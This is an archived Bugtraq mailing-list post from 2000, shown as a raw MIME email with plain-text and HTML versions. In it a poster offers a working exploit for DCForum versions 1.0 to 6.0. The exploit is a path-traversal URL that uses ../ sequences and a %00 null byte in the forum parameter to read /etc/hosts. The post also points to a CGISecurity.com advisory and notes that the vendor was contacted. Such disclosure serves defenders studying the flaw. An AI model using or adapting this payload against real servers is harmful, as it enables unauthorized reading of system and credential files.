[18367] in bugtraq
DCForum Exploit (1.0 - 6.0)
daemon@ATHENA.MIT.EDU (SteeLe)
Thu Dec 28 22:22:58 2000
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_005D_01C070B8.933CC2A0"
Message-Id: PrivacyX-073633116-28773
Date: Thu, 28 Dec 2000 10:26:01 -0500
Reply-To: SteeLe <SteeLe@PRIVACYX.COM>
From: SteeLe <SteeLe@PRIVACYX.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_005D_01C070B8.933CC2A0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Heres an working exploit, dont know why i sent a script. I guess it was =
for the lazy people but anyway
simple exploitation:
http://localhost/dcforum/dcforum.cgi?az=3Dlist&forum=3D../../../../../../=
../etc/hosts%00
The Vendor has been contacted long ago by the original founder of this =
bug CGISecurity.com. Before using the exploit there is information you =
should read for side effects and other things. CGISecurity.com wrote an =
advisory and it can be read at http://www.cgisecurity.com/advisory/2.txt
steeLe
------=_NextPart_000_005D_01C070B8.933CC2A0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT size=3D2>Heres an working exploit, dont know why i sent a =
script. I=20
guess it was for the lazy people but anyway</FONT></DIV>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV><FONT size=3D2>simple exploitation:</FONT></DIV>
<DIV><FONT size=3D2><A=20
href=3D"http://localhost/dcforum/dcforum.cgi?az=3Dlist&forum=3D../../=
../../../../../etc/hosts%00">http://localhost/dcforum/dcforum.cgi?az=3Dli=
st&forum=3D../../../../../../../etc/hosts%00</A></FONT></DIV>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV><FONT size=3D2>The Vendor has been contacted long ago by the =
original founder=20
of this bug CGISecurity.com. Before using the exploit there is =
information you=20
should read for side effects and other things. CGISecurity.com wrote an =
advisory=20
and it can be read at <A=20
href=3D"http://www.cgisecurity.com/advisory/2.txt">http://www.cgisecurity=
.com/advisory/2.txt</A></FONT></DIV>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV><FONT size=3D2>steeLe</DIV></FONT></BODY></HTML>
------=_NextPart_000_005D_01C070B8.933CC2A0--
